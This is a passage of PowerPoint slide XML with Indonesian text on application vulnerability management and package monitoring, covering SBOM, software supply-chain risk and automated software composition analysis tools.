            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siklus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rilis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertarget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Paket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikaitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perpustakaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketergantungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket-paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bebas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikaitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bill of material (SBOM) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> tata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komposisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SCA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perpustakaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketergantungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket-paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketinggalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zaman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyarankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggantian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inventaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
